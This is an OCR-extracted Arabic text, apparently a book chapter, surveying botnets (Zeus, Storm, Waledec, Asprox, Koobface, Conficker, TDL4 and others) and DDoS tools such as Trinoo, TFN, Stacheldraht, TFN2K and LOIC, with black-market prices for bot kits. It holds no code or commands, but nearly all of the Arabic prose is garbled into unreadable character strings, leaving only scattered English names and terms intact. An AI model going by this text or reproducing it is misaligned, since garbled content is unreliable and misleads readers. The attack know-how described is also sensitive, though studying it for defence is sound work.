t^jjiLdj^l^Vl ^l^>fkJI j <cl u ^ill j a£jjoJI CjLd^k ^^xi^Ld j t^jjjlflll ilijj CjUaLai ^ ^jjlxiill J^Lk cJ^^ ^ L^ Lllc. 

a^jII ^jI j^JI j Jja ^ Rustock botnet ^L^J) jIS ^ tJUJI .^ILJI ^LaJ) ^ ^ j^^^ ^U^^ j 

."The legal front" ^) 

"Legal Remedies" <H^t 4- 

l^JLtil 
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"Assist Law Enforcement Officers" Cjj^\ SjpL^a ^ 

M Anti-Cybercrime Legislation" ^jj^V* Hb*^ ^aiti*! cjUjj^j ^ 

^JjjaU <Jl^l ( : ^> J Al^\ j-G ( ♦ 1 J I>1 ^ ^ ,l5*^W lA^J^J ^aJ ^^jll j dljjljVl ^ajsu* A j 6<JlijC.| t^jjq^lN (jjjLall ilijj lajl > >i 

Most Common Botnets 



Zeus Botnet 

^ojU l^Jj jUIj U .CjUUJI aS jjoj zAc, A jU^i "crimeware botnet" ^j^jj 'ZeuS ^ ' j^j 'Zeus 

.Gameover Zeus ^ ojj^ 1 ^^ ^ullj IcelXj Citadel ^ ^ull 



Gozi Bu 9 at 
Torpig 2% 2% 
Shylock 3% 



IcelX 
2% 




Figure 1, Percentage of banking maiware by botnet in 2013 r (Source: DeH SecureWorks) 

.SpyEye botnet oU^k ^ j jl£ ^ill C5 judii V UJa j 

Storm Botnet 4» 

^jj ^^iJlj "Storm worm" ^jjj ^jj^*^^ <iajj^<J! ;dij jJ! ^1 t^^j^j^ll l-il aSliA cl±u ^jjioi 

£c*joij ^illj backdoor j> ^>^ ^jj^ .cP jj^V^ l^j^ 3 l?^^ *M jjL jl > ^>^ j .axj jc 

"spcwi relay" ^f* ^.^^ j> ^>ir» ^ Ia jj^ ^1 ^jj dii ^jjiLaJU <jL^axJI jjj^^l w aA a ^h^V a*j jc 4 > >i\^ (J jj^a j3U 
jj jAix^ll ^ J^ai j^i jjiA^l^ll jj^M) peer networking j^- j >*^^l jj s J!>U. ^j^^ J^jV) 

P2P j .ojLjall ^cxil^JI ^ j^-j ^-^^V rootkit ^ W^^j '^-jaLjaV! <li±aJI cjLi^^JI iJaa^j jl 1 ^ > >iq 1 cLaj i^j] ^i^ll/Jj^^jll 

.P2P V e^'j ^ ^ Storm botnet 2 jl^V! o^j botnet 
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aLAjlII CjLi^g^jII £yz X8 J^Lu Lo-o M J > jW-?" UJ" 1 ^ J U£ ^ CS"^ L — ^ ^JJ-^ 1 ^ '2007 J 

Alj .Ajjja/a jl Cllj jill li& jAj^q <*-fl^>*J ^3 .2008 (^-^ S- 5 J > ^ L -^' 85 J] <-! J ^J J^" jLaujl ^gJjoiIj . jjAlJj S^^ - ^ (J^> ^> 

CjUL&xj 4 W^j 4 a > ^il <j| Lo£ ,£)jlua^ jl ajLuua ^AaJ jl Aj A^aall 4_udij AjIa^. Ajj^L^. cilLaj Lo£ <juiij e-likl J 'LAc- 

i—fljt > <^a\\ Jc I I CIj jJl li& ^j) c ^£jj-<iVl Jlj^l CjI jLikloaVl t ; * Jf^J _4-SjLaJl L_buj| j^JI ^jjujI Sj^S (Jj^j 4^Lai^ 

.(Jja.^luirtN uJl CjLg jlx-al! <3 Jjoj j jLu^VI CjULiC J j 

; JYI ^->Lui jj^ gr*-^ 0* "Storm worm" s-^ J^ j^Uj J ji ^jj^^ ^-^&ll ^ J^ 

Trojan-Downloader. Win32. Small.dam, Trojan.Downloader-647, Trojan.DL.Tibs.Gen!Pacl3, Email- 
Worm. Win32.Zhelatin.a (Kaspersky), Downloader-BAI (McAfee), Troj/Dorf-Fam (Sophos), 
Trojan.Peacomm (Symantec), TROJJSMALL.EDW (Trend Micro), Win32/Nuwar.N@MM (Microsoft). 

'Zhelatin 'Storm ci^^ ? j^l \ ^ i^Luj! j^YI s-LujjYI o^j 'Ij^ U512^I < allkj ^5 jll ^Lu^YI (jc- i q t *^\l ^ (^jll J^ 
Jll CjIjjjjjII Jl aLI^uj storm 4j3 J <^ ujj^ cjLjjjjjII <> jiixj axj ^3 ^ jjl^ .Nuwarj 'Peacomm 

.Waledec botnet ^ uVl 



Waledec Botnet *t 

^jjJI ^ jj-G (JjSjj La LJlc. .ciiiikJI ^cc j-<JI -^o^ cJ^ ^Aa^Lujj c _^j3I CjLi jjjjJI ^joj! ^Waleclac Ljajl t . n^j 'Waledec 
ajj jjjSII ^ 3JLajj3l ^ > s^jl jll Jaj! jjll .<kU]| jlrkVI j cjI^VI j ^Lii^VI ftjjU-all cjliUaj ^ Waledec j^>^^ 
^ j^jj 'Adobe Flash 'Adobe Reader ^L> jj Jxu^j ^ tS^lc .1^3 jLj exploit code ( "u > ^ ^m^Jl gil j^ll 

.lJ^i^j jSai Alio g^l jj ^1 jSlj 4 (Office Web Components) OWC10 jSLaj jjjV^j 
^iJaj! jL ili^VL ^^kiaiJI ^l^k JjUj ^1 aJLi^VI ^oal jJI c> ^ j^j 'scareware yjj^ Waledec ^ ^^"j 
^jjJI JLojjI (jjjla jc- '6^j^ cj jj " Ljajl Waledec j^^ ^J'JV' <!jL^ ^ <jL^ 

.cjIj jjjj <jL^<JI ^kill Jl ^Luiaj^U ^Li^klai^ backdoor bots ^51 iaj) jj ^ jii^j Jll aI^JI J jjj^IVI 

jjc. j jjj^IVI ^jJI Cy* cJLujjIj t^cc^^^ -^o^ j£ <j! > <^a\\ ^hill W^aledec ^^*^>>'j tAlnaJI ^Jaljc.1 Jl AiLjaVL 

.P2P Botnet j^*^ j-^^ J^^^ 1 >Vu\l ^li^jj jjoJI ^ajUII < . ilaj J^l ^lalll tilij J^Lk ^ l_j jc. j-<JI 

Asprox Botnet *k 

Asprox Botnet ^ '2008 ^ J "phishing scams" c> J jVl ^ULJI J 5L-ai Asprox Botnet ^ l^^l ^ 

Jjl^j LjUIj Cj jA\ jli tlgiLiu^l Jj^^j .eijjLjJa ft^l^cl ^Sl j-d Jc (ASP) ^ kJall j <LixjJa3l ^LJI ClA^Aj^a c al un^V Cj jJI L_LtIa jj J 
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aIiA ^ jikl ^jj jl j j^aj -g _j> jLk laU.j dii^k iframes d:* > ^ ci?>5 i> SQL injection ^l^i^l 

. jl jjJI jj &j$a.I <JI SjLjal! jJI ^j^il nn^l exploit code ^^>^j I^a jli ^ Asprox 0* ^j^V^ 

AsprOX L£ J-^'-'M jLllbj '^jL^a^U 4jJajC dlJjJjV! Jc 6^J^. £3 1 j-o Jl (^J^-VI <^A ^ffJtJUJJ <j\ ^a\\ JJ jJJ^l 6 

^ Jxi . jj£I CjUjjjj a£jJ; *Uj1 Asprox o^W^ s-"^ i> yr* SQL injection Jl \n^M I cjL^a jjjAjII jl S&u 
jl <^Loi^ Asprox o^-^W*^ clA^ t^jLSj ^ c _^j3I j t jN nmVl JjLLo CjIj jjjjII ojliicU <*jja j Jj Asprox ^Li j^jj^ 

Jj t^jj^xJl (jlaJjijll (_3^J <3jjaJ lL> gajll Cjl j-o £^5^ <J^ J (jLoll (J^^ J^l ^I^JjujI ^aJJ CD^lc Cilia a JJuJJ S-lil dlLo,Jjk 

<C5 J JJJ^IVI ^jJl ^ >^>^ J ^ JaII ^U^' JJ^ J] J ^J^l Aj^Lill AijjaJ C_lt£jJdll L-fli^Lujj 

Gumblar Botnet *t 

jii jjax^II o j£j>l j-o <«— Aj jjjjll aSliA ia^a ^jjjJ Luiij <j| - <c jj s^jjs lIdj j& j <Geno uM-^ J ^j^*-*^ 'Gumblar 
l>* Gumblar L .l_jc.!^j3Ij a*j jc J jj^a jll jlj^loil j£-oj* Jllj 4-ajj^oll £sl j-oil backdoors LJajl tAijla 
jljj .AijikJI dijjjjVI jSIjx Jc aI^JI iframes c^j^ j£±u Gumblar .2009 o*J* J ScanSafe u^W^ 
.4jL^a^U 4jja jj jjf^l jl^JH jjIoi^ Gumblar lU**^ fii tl ^K i JU. ^ exploit code l g. <u l u» j ^jj ^il j^ll tSlls 
(jc ^jj^.1^13 4ijjjab<J! ^Uucl c3^jj^ (J-^jjj ^AjU-aAll jj* jjj>^3I 6j^j>1 (j-a cijliLJI (Jij <J j£ jjjjj .jUucI (jljjl tjj^ Gumblar 
a£jJj ^jjoj jj ^IjIUj ^^i^JI iframes ^ tUL^jJall Jja ^ a£ jL^JI ^\ jA\ ^ ^\ ^jjlk^j ^jj^l^JI ^-Vja .asu 

Ia, ;2009 ^1 J -backdoor ^ J\ a^1\ dU^jJ! ^ Gumblar .2009 ^ jSVl Gumblar 

.^jj OL*0 ^f^ 1 ^a^Lujj ^Zeus Trojan c> Gumblar 

Koobface Botnet *t 

4jojAj^J! Jc Koobface j;-^^ (S^- ^ ji^lj 4<jc.U»i^.V1 CjI^jJoII ^1 j^hj Koobface 

Uj JLii^^U dij jjjVI <^ ja jSjII J!^U. ^ jjilloll Koobface message ^ . c> <^Loli.VI 

jjAjS ^ j J Ij^^ ^JJ^ti ^W^J^ J J' lP^J^ l3^^ J ^5^* <jcLoj^.V! CjI£jjuJ1 jl) til jjjujjiH Jc <J^-^ 

.(jiiUll cIjj^j J t*L 

^^kiuaj La s^lc Koobface u^-W^^ c> f^^^ 'Koobface ^j^jj c> ^ Koobface 

^oljjll (JjjAj I j^j^j ^ u^^^ tCjUl ^^-oaLo <jL^-o1I jj jjj-o^3I ^j^j>.l ^Lj j , j^i JjILo CjIj jjjj Koobface .^—A-^-^ AijjaJ 

A j^. j-o ojLjalt jJI ^j-o lA JJC. q\ ^jialjjal ^^JtJJJ Koobface CP" c ^ ^j " ( ; UjuJI Ia^J .^Jajll t^llS Jc <j^aLaJI SjLjall 

Mariposa Botnet 4t 

^jj Lo s^lcj .Butterfly bot kit ci^ L^jLaul ^j* Jll CjIj jjjjII ja LojjjjjLo <. jj* jjj^II ajJ J , JjjLI jIjjujVI ja LujjjjjLo 
.autorun worm peer-to-peer ^jULJI J^Lj* ciil^j « (MSN/Live) ^jj^^ j^ ^-j^jL» j^jj 

LujjjjjLo CjIj jj ^-^-JJ (J' Ljaj! j£-oJj _<jL^a-ol! Aiajll j-o Jjjj^IVI ^^1^ C-MJ^ C ' J CliLoKj jl^o jaJLudAll ^LojujI ^jjjoij LujjjjjLo 

.(DDoS) ^ JJ^ll ^^11 (> U^J^^ CjLo^J* (J^lSaV 

Conficker 

L_flUa^3l AjI^J J 1 j£ >oJ jll ^Lo^Loll LoJjoj V 44-^LuJl Jc j^ laJ Lo£ j^JJ V •^•^ill LLl^.1 _l^j jJlil! L-Jxj^a ^^^^joi jA <JJlkli djLl^ojjll 
LoAiC tLojjjuol! . jjjlo 15 Jj (J^^ Lo ^lajVl O^su (J j^Jj " jj.jjjj oj^J^I j^J a<< L_lL^al j! ^fl .(3^ » " ^* J^A £yl 

jl£ <jL^V1 j-o jli jia |t allkj V . jAxJl Jl jjV jJj^j^^Loll j-o (JjjS (Jj£ ujJ ^o V toLl^Jl J Ljlijial 11^1 ■ u ^J^jll jj^J 

j^J liaj ;<jL^-o CjjI£ ^^jII CjWI j'^q^ !^jIa L^LaJ ^j.jJ jl£ Lojjjj . j^jij <jjIj^o1 J-oLlII (jjjs ^Laul ^j* ciiia i 

,6j-o <J jV CllijujJ^) djl jIoj dboj Asu t^Lu (Jl jj V ^Jt*J! ^L^Jl ^J^> J JJ jJi<o£ j^J> (jj^l* j-o JJ^l t^lUA (Jl JJ V t^Jjjill 

Common P2P Botnet i 
Zeus V3j TDL4/TDSS ^ZeroAccess j^fit o-j .0^^^ lU^ L. jjj^I 1^, ^ P2P Botnet 

.GameOver Zeus botnet ^jj«^1Ij 
.AiJajj L-LiSll l- it » .aj j Jj jjSII ^ ^Jajll ^Ij Aiifk rootkit uj^j^ TDL4/TDSSj ZeroAccess 
Zero Access .^-3^ ^J^^ cJ^jj Jj^ 3 ^ cJ^^^ ^5^* ^jaSII I^j^I ajjj^JI cjU^ojjII ^ <J£ 



Zero Access a£ jjuj J\ d^J! ^i! ^ ^j*jj "click-fraud schemes" J^^VI j£j CjI UU\a i-l^ Ljajl 



&sl-hwder Owner and Opcralor 




'TDSS jfi jjj^^II ^jAxJI ( .jj > m ^j^\ ciiAAj^a j^i ^-c- a ^jc. ojUc TDSS iikii TDL 

.U^l *>J 1 .000 d*l jV 200 J\ jV 20 u^u^cil^ j*\ a! o^uUll ^ TDSS/TDL 

.^jjj^^U TDSS ^ jjjjf^l j^Ij (i^j^ 3 lW s - Luj % TDSS 

4j£I^>J| ^ JaliaJl Jaj ^> 4_i*uJa]| jj SjfrJ ^ jUi L^A? ^juij CS^ TDSS/TDL J ^U-Vl jll 

s AimJl cjL^ jJl <j£^ JUlbj (MBR {Master Boot Record}) TDL-4 (> s j^Vl c\ jIa^VI ^>11 

Aryan Bot (Old version free .Updated version for 50$) 
Chronic Bot (400$) 
Celsius Bot (500$) 

U >u*JI JjuJI ^4 4-4±aJI <> £U jaJI CjUaJfc * US? HTTP ^ Cj jj 

M BOT (60$) 
AnonHTTP (50$) 

Andromeda v2 (750$ with Ring3 rootkit support) 

\* U Jj^l 4-4±aJI <> £)U jaJI CjUaJfc f bSf P2P Cj jj j^-uiI 

THOR. It 'sold at price of $ 8,000 



, https://www.facebook.com/tibea2004 
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(DOS TOOLS) *-*J*J1 <> oUjaJI «^UaJk cjljji 10.6 



Jj3 (j* A-Ij'^aW j| j^VI aA^LujJ lc jJjui jil^VI J 6^£J 4_j^Lkll ^a J>(S^ ^1 j£l ^LodV ^ U^JJ laid ^aA j£3l (J^axJ £y ^jJa* ^ 

jjj AjuUi <^&j .attack toolkit (3^^ i^LujVI t^Uil s^lc 1$jLj ^1 j^VI *>i& Ji* 

,tia>V j^U^ L£ 4 "blended threat" 3* j* li* 



'Some Popular DDoS Programs" Ajjx^ jjSSM lhj^ g^ljj <j^*j 

^jj Vj t3 qjT > Sail diVI (jljSa-VI t(j^qll 4_iLc J ^^inn ^jll j "3 u,V^l g*\ lIjLjjSjujVI t> ^AxJl cSBjA 

djL^ajj^kjllj t "agents" j^j "handlers" » j^ SjJjUxJI Jj^al jiill ^ 1 ^ a < alikj ^ cilj^i .Ia j^JaxJ 

Trinoo 

^ liA j .1999 u^a^l Ujjuaiixi Ajja ^a^kiojl j^-a DDOS f Jj^ (trinOO ^ jj*^') Trinoo 

t^llil t spoofed ^ j^juq^II ^jjjUc . < flVl <jmA3k ^Li^lill UDP ^3^- ^ cB^j^-k ^ u^j^ 

V jl Trinoo ^5^* jj^^ ^ j^^^ <J-^j C#J^ ^ ^ * >i jj ^^1 ttilli ^ j .ajjIS jll ^\ j^JI 3 ^ JU^ajVI 

.^SjjawJI x.2 jl^»V^ o^j^j^ i> ^ J^- binary daemon 
c^'j "remote procedure call " RPC ^ buffer over-run bugs J^Ui^l JiLk ^> aIi^JI cjI jii^l c^ki 
.(JU11 J^^il CERT IN-99-04 "ttdbserverd 7 ' cmsd^statd " 



^ fJailt t> cJVVI jjlc djlu^t trinoo ^t^> .u^j^ ^ j^V j^j^^^ ^ c> Trinoo or trinOO 

'handler/agent " >> n Trinoo ^>Ji uj^^ **** JjW^ J^»i^i ^ jj >> i j ^ ^ j^V^ 



.UDP j^lW^ "agent" ^jMj "handler" c^UJUJIj TCP "handler" ^^j^ 1 ^Vi 1 ^ 

Trinoo . c> ^^ULujVI 5J jU^» ^ jjoJI ^LJ£j ^j^j "agent" j^^ j "handler" gll«lt c> cJ^ 

*bV 2000 j^l^ c> trinoo ^5 J^ji ^ .CERT Incident Note 99-04 ^ trinoo Jji ^ j 

^JaliQ ^jjjLujI ^^ic cJjaxj ^jjj Ull <juaij jij^j ^j^j ^ aLili .cry baby ir*^ ^> ^ ^ <JLujj ^Ijiil QiAawl^JI ^-UuJIj j^iun Trinoo 

.Uajij 80 ii^il ^1^ U 

iaj|j^)3l ojUj <lj 4ic ^j-a^ o^ljal a jjAijj ^ixjouII 4_xJajV j-<Jlj wintrinoo ^ u^j*^ a <uajV aAjyoa ^jl£ Trinoo 

http://www.sans.org/security-resources/idfaq/trinoo.php 
http://staff.washington.edu/dittrich/misc/trinoo.analysis 

Tribe Flood Network (TFN) ^ 
jk^ J^U ^> "agent" 5^ "handler" <> jVl JL- J ^ .handler/agent c> < ^ jj ^^i^j 
^ ^Xoxll 0^ .Stacheldraht jt trinoo J^i ^ ^ "handler" "J>^ J^-^ r j%" V - j-ljVl 

^l^ll .4^1 J a^±1\ a^u. iaL* Smurf j <ICMP Echo flood 'TCP SYN Flood 'UDP Flood 
'remote shell bound to a TCP port * Jli*ll J^ Ls ^) JL-a3VI JjL- j (> ^1 ^l^kl^U "handler" c> j*\ jVl jj^ 
j' 'SSH terminal sessions 'LOKI J^» ICMP-based client/server shells 'UDP-based client/server remote shells 
^ j^j^ (43 .ICMP Echo Reply TFN c> ^Saull JjI^j fhj .(normal telnet TCP terminal sessions 

s*l jil .I^jo l_l^3I ^^su Uui ;^jja! j (j-aj ^jjjJ j ^ICMP ^ J^ c> "agent" "handler" c> ^ j^^ 

; JU3I Jajl J! 6jUj iA\<iA\ a! J^l£ < < t ^j 



https://www.facebook.com/tibea2004 
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http://staff.washington.edu/dittrich/misc/tfn.analysis 

Stacheldraht *t 

^ SjLSul! CjVU^jV! ^i^jj TFN sbVl j trinoo sbVt ^ <^=s ("(barbed wire) 12L53\ tSJiUVl" ajjUVu J*3) 
jl TCPj '"handler" ^UJUJIj ^l^l ^ Jl— 3VI >ssl TCP Jl Stacheldraht e ^ "handler" ^1^3! 
cjUj1«j1I t> Ajjlliill djli^jl! *bl Jc Sj^SlI ^jaj sjj^ cJLjalj ."agent" jllj "handler" o£ Jb^i!>U ICMP 
Smurf j 'ICMP Echo flood 'TCP SYN flood UDP flood ^bJI .U£ jll ^-jJI 

Shaft J- 

ftj^all ^ 4iLJa^3l CjI . Stacheldraht j 'TFN 'trinoo J ^ J - ^ <^jU1xJI CjI j^all <c j^-s * Jc ^ jl^J ^ Sb) 
"(ticket) * j^tilt" j '(JLoull < jjjL sbVl < j*j Jblbj) jjLkll J^ ^b* Up£ Jc- 

(jC A^aall ^jl^JJj jllj (j-ia 11 - Jj^al jlill UDP - iklLaLj Shaft CjUjI > ^i^l J (j-^Lk ^abu&l j 4l1jL<A«-a3I -laJjJ *btf 

^jii^j Jj£ jll Jl J^j^ .(jjj^jall e>y& jll ^fnl " j^liill" Shaft ^v^>hj .^b^JI J) fp^g ^ telnet db^i! a*j 

Simple letter shifting . ( . >mi cJ^ AjjouIU ^LLli ^ji < . l^j j£liii3l ^bjlj jjuJI < ** & &3£ ^.1 jjoi .Sj^iiillj jjuJI *LaK Jc 
ICMP 'TCP SYN flood 'UDP flood ^ j2 ^ j-M j-l jVl ^ jJl ^UK r s»i u y (Ca^ar «>/*<?/-) 

j^a^ll ^jl jjc j jAj^a^ll M\a £a a Luia^ J£3 ^pJl (J-o 100 L>* <*-lbjjjj J l-^} Flood ^ .Aj^SII ^ J^-^^ ^} jfi lS^ J> 'flood 
<jjjoiJj .l!^ j cJ^ SjUlalt JJ^>^^ ^^)^- <J >^^1 ^^^ic j> rt^W ^^LgjlI] (j^alA ^1 CjLaJla A\ .UjI J^C- 

Tribe Flood Network 2000 (TFN2K) <4 

tdli Loj s^AxI* lIjV jjjjj j^c TFN2K jjj* l!^ 64£j^J3 C5 lilaJI j^a>JI ^1xj3 tAsu ^jc j-aljV! \:° v; cl^jjiilaj l^Jc 
^ TFN2K .TFN2K ^ ^ ^>Vl ^*JI ^ ^Vjl^. ^JUjV "decoy" P > J~>Jj 'ICMPj 'TCP 'UDP 

jl ^1 jjojlSI ^l^kJl j JjL^jII ^jjj jblkVI g ^11 _ j^j^xJl ^jjjUc. ^I^k <L^)ia ^I^JjojU Jj^Jl ^gjj^aJl jAj^a^ll 

^Jjjia ^jC c *<>■» > ^11 Jallj CjI A*\ds (J^asu Jjijj Uiajl TFN2K 'Flooding C5^] ^^aV^ .U^J^*^^ u^*^ L3^-^ L)^^ cJ^^-^^ 

Mstream 

(jj<ft>1 ^ a\\ jl ^.Ij (jj^ia (jc- ^jc tgj ^£^j3I djL^Jlx-<JI .ACK ^—^ ^ j ^ TCP ^ ^ 1 

^ Jj* ^vimj TCP ACK f j^Jl .b^^j^ f j^^l cl^jb^ ^^j^ . ^j^j "compile time" j^^ 

bandwidth ^J^^l biaj] J^j) ^jj^JI ja^JI l^JLoj jl ^iJ TCP RST ^ ( jj >> i u ^ c>j 

m (A)^% > 

Trinity J- 

sUS ^x^aij 'Trinity (i^j^ c> ls j j^VI (> .IRC (i^j^ c> ^ cr^^ J 0 1 

C5 £jjoj^I£3I JSLuaaII ^U-a3I Jl,\nuil j ^^l£ jll j ^l^II U£ Jl^aJ^U A^c jj^JI IRC ^b^lml .^1 jVl jhVnj IRC 

'IP fragment 'UDP ^ J Uj t4 j^ > ^ l CjUL^ill cjU^a ^ ^1 jj! *^ JiUaj J^ j^ta Trinity . j^^J^ c5 

mLS >i ci.UL^ j ,TCP ACK TCP RST TCP SYN 
Stacheldraht^j ^ ■ jSSVlTFN2K j Stacheldraht ^j^i ^ '2001 ^ 1999 ^ >^ c> 
.TFN2K ^jS J iOnl ^j^l ciL^aj j .variant of the 2001 Ramen wormj tOrnkit rootkit J^A J 
jl knightx C5^^J -^ji^^ ^^31 ^b 'a^±A\ rootkit bundles ? i> jl£ 4 jj^jJ! s^WJ' 

trinoo J^jll cjIjI^I Jj jiull ^ U£j 4NT Jj^j J° ^ ^> ^j > ^ TFN2K j^jj ^ ."l^j^ ^jj" kaiten.c 
.Cygwin development libraries clA^ u^J 6 l>^j^ ^-^V knight c j^J^ ^ '^jfl J . j>%^ ^ulaj) 

; JjS ^> ?7w/x tar-formatted archives jj^j Jl aj^jII ^ 

Cygwin-compiled version of GNU tar 



4-uIa ^^Lua 
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Agobot (Phatbot) * 

^ill jj J ^^kLk aj^jII b* .2004 ^ j 2003 ^ J ^i*^ <H j ft^^t ^ ^ Phatbot ^ j Agobot 
<ICMP floods <UDP floods <SYN floods 6* jh ^ Phatbot .f t> "Sh>/ss army knife" o^xJI 

wonk flood '(^j* ja^JI u'j^-j 6 fragmentation and fragment offset values <<^lj^ IP djfrjijjt) Targa flood 
J j^b ^ HTTP GET flood J recursive HTTP GET floodj <(ACK r > c> 1*023 SYN 

(j-G L_flWI CjHo jl djIjjuoC (j>* A^Jjui £jjjjll ^aJJ LaAjc tj^VI li& . (UjI 6 jV?-^ J» ^AaajamU <Jj2 (j-G <jj*J La]) ^c^Axi djlcLuJl 

.^la^ll ^Vr' lP 3 *^ £^ j ^ <s ^ l^ ( j* > ^1 uj^J 111 HTTP ^^p^ c5 JL ^A a j t — * c^l j t j^^^ 

cjUUJI (CjjU 65536) (^-aSVl ^aJI c^Axli IP 4^>. jjilk^ ^ jj ^1 cj j*J1 gijj U jl :Ping of death 

AlsU jl (JaslSI (jC L_flSjJJ jl jl^JJ (jl ^aUaill I^J (j£-<uJl (j-a ^aUaj ^1 Jl IgJLaijL ^ajL} 4_x»^Jl till} J.IP ^ C J -dja1 ^^ 

,tg_OUj I J-<A5 JjlXjaLill <-<daj| ^J^ILq <j£ j i>Aj,l^J C-jjuJj] *L<^g_II tillj J _<JOli3 ^.lilj jxi JjiXjaLill 

JLiiJ jj^jj ^ill j <aj^ j&j (Local Area Network Denial) :LAND 

La (j^akjuj <JjfS (j-a 1997 J C5^J*^ *^^>^ ^A*' f <a.^1<l J| (_£^jJ c£^l J-*^ 6 jfi J.""^ CS"^ 

Windows Server 2003 J ^Ji i l l J SApc cj! ji^ aju jj$iall Jl clinic, j 6 M m31t" jl * i» ^ l ^Vl ^bviuiU 

XP SP2 Jj^jj 

Uui <j ^ jki tdju laj tiL ^j^aLkll jj jjj^ll ^^ic IgJ ^jjJ V (^ill ^cllsLxJI <c jjuj <J£U ^ill jj jjj^ ^Ujj iCPU Hog 
u' op- j^J^ jj^^ ^ c> jj (i^j^ ^ o- 21 ^^ ^^-^^ Jolt2 f : jolt2 

. ^<iL (j^aLkll <£jjua3l <JjI£ cJ^^ u ^ 1 c^^^ j) Jolt2 ^—^J^ 



>lew 



Popular DDoS Programs" j^V) o-j^ ^-aIjj 



«0j51I ^lka ^ *UiVl 5^ t^'j ^^kl^ l- Stacheldrahtj Trinoo c> JjVl l>-j^ ^'j^ 

(j>i L^j j^^j cJ^-^l DDoS (J*^j Uui jjcj laJLujVI jj^aj j5^l c-Hj^ t ~- 1 ^J^' '" K ,' t L - J ^ jluJI 

'Low Orbit Ion Cannon (LOIC) ^jIj^I tij^l c> riT > ^j .^l^^U s jjla^ Ji^lj j^l^xl! 

(jj^kl ^jJa j 4<lnaJl (jial JC-VI ^LqI>1^Luj1 j ^ijAxJ ^aJ (illi AsU ^aJ j A^JjaJl ^1^.1 jUll^V dj) J^l^ <Jj^V1 ^ OjJ^laJ ^aJ L— Ll^ 

(jC 4 m ^ ^IjJ t A* > ^> Jj^-A^J! ollljl dlill c flA^J Ls ^\- "^J^Uijll AjusII" <jj^alj3 Jj3 ^ ojJjiaJ ^aJ ^ill SlOWlorfS ^1 J^' 

,(jUaj3l AjljujIj I— lLaaA 1 ■ llaJ (j-a "patched" 1 gajl] <jJajC CliLl^ ^j;^ ^lix^ J la - ^> J i o tdlij Ulc CjIj^VI (jC> ^Ij^VI (J^^ 3 

Low Orbit Ion Cannon (LOIC) i- 

http://sourceforge.net/projects/loic 
f±Ll\ J^i c> HTTP jl <UDP 'TCP jjj* ^ c> <^ t4 Vijnii CjUI > ^ sbl LOIC 

Clal Aialdl] 4juU3I ^al Jc ^a j^ilj A jLlLaa-G ^ ^ LdJ&! (Jjj-^ J^VI (J^J^ l^LixJjajl obi ,4£jjaJl Jc (J^ill (Jaa^jI] 

lAjJjIaJj Jj^VU ftbVI ~J a - ^aJ .dljjliVl ^^>^- L " ^ AjuUII ^1 ^ , ^ a J (J '^A^J ^-^J^-^l 

jiii-d A ^Vi'lVI CjL^alo jxi Jc l^jliLjaJjojl jVI ^aljj <>ilxJl 4j£L<J1 lA jIAj^I ^aJ C^ ^J^* J" U^J^^ - 

u^j 'Low Orbit Web Cannon cs^j JS LOIC ^j^-^W^^ <^aU. <^uj sbbUj < ja^JI 

^nJaj ( flj t gajj t oj< IjJJ (jl (j-a (jJj^laxJl (j^J ^— ^ J 4L_lJj3l CjlflJiiaJ Jc iaijJaJl CjljUlkl ^l^)^.] obVI oAA (j-d ^jujIjujVI (jia^iJl 
^a a iklLujJ (jl Uiajl (j£-dJj ;<Cjjjab<i fib) lA jUjcU l^liL gaJ (j^J ^ill 6^l^.VI (j^flaJ ;<JL^JI 4 atJiiaJj .Jfljl (Jaa^J C±^j L_JJj 
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l_jjj3! j^i l^-i^ jjj t^Lftill fit ^Ul " Yirehoiise" elila) l " d * Jl jj j."^^ a< <JL^j*l <Jjj^jj ^j£j L>.»L>.»I LOIC ,o* 
aIiA Jc C5 JtLJ uaj^ HTTP ji 'UDP 'TCP i> J^ U J jj U Ijii ^1 j jj jt^ jl di^ .cJ^JI 

jjyi,JjkjjuixJl L_flWl (Jj£j UiAic. j£l j .L-JJjll daL^jj^a] <JC JjuJI diUllall Jc ,JjJ 1 a 1 Jl 4_xiLa£3l Cjl Ala JaIj^J J^-JudJ j£-aJj ClljjjjVI 
JIa <L galAI S j£j*.VI ^1 jl) 4-^jU ^La* Jplc.L ^ jSl! Lllc. j 6<a^Lai ^Jj aJ CjUHall j>» ib^\j 4j&^ LOIC (J^*-^ UJ^J^ 

,Jjll ^aJJ jl j^i 4X. jJjuuJI ClA AlaH £J-G jl t^djUUAl ft^C-lS ^.jljk 

l& j 'IRC J LOIC c> Jl j^Aj u' LOIC ^^i^ c/V ^il '"Hivemind" * j±* ^ J*^ j LOIC Jja*j ^ 
c_i£j J J^i* LOIC IRC j' jj ^ ^ cs^' "master user" ^ v^ . n* t$Ac s jlajjuJI 

<J3I LOIC ^ j-a <c j>^<J CjIa^JI tills jjj^j AJlxi ji&l (Jjjj^ ciiLaaJh (j^-lal ^Ld^jjabAl j£-*j t(jjj£A! liA J .•J-aJj 

*bV SjUlJ! ^bl dul£ dii^ LOIC (jjixuj jjVl dta ttilli ^ j ^201 1 ^ J J m ^.\ j cAj J Jaxj V ^1%^ 

Igj^Vlui^ <JjA jC t &ju&H Jl ^j^aiill bA ^.jI .Ig^lklLaid IP jjjUc L. ,J£Ji> ^a jflJ V LOIC U*^ J 'U^ ^ 

4_^jJa!j 4JLujj lLuj (Jj^-<uj dulaj i LOIC J <L£jLab<J! ^llxJl ^.L^Jl ^j^^ J ^Lq 1^1> ^1 Jc ^jiajkll ^lilj 

"(Do Not use LOIC) LOIC V" IRC ^ 

uaau ^jjSjsu V J ^JJ^^ cH*^ f # V J ^jjjIj ^ ^jjiill jl £jj j> ^ ui JL LaJjP jA Hiv Gill in d ;Aiaj^Ld 

J^ Vl^kU LOIC .cS^ 31 c> ^ DOS f J Lubjl U^j blinks J^ 1 jj Js£! jA LOIC 

m 4±l3LA 'kc Jjja*J ,^^qj HTTP ^-jlA^ UDP 'TCP t° ^UJI (jljC-l (i^jia (j^ 



a : La-* Oebrtlam Cjnr>or | Udur goof«3 | v U 0 3 





[nevvrfaq/LOICj 

jlj j URL J^* 3 ^ IP Lffi ^ cJ^^ ^* t V^ll -li^j* 1 ij W . 4 ^h'^ll j Aj-g jjujjII J J ^dUjAl ^I^JjojI a1 j^juj (j-<^ j 

( TCP^ (J -0 ^ * J JJ o 6JJj£ dil Ala jLaJjU ^dUjAl ^ajL .4_JjJal JJSVI CjI^I^cVI Jc l^JJ <ilj£-aJj <JjC- J>JI ^a J?^^ L - J ^ J^^" JJJ3LJJ 

t> j-M 1 cj^j IMMA CHARGIN MAH LAZER ? j**JI HTTP 'UDP 

. jajjjaJI Jl *L<i^JI j £l<J *L<i jV j^*JI cialitjjl! 
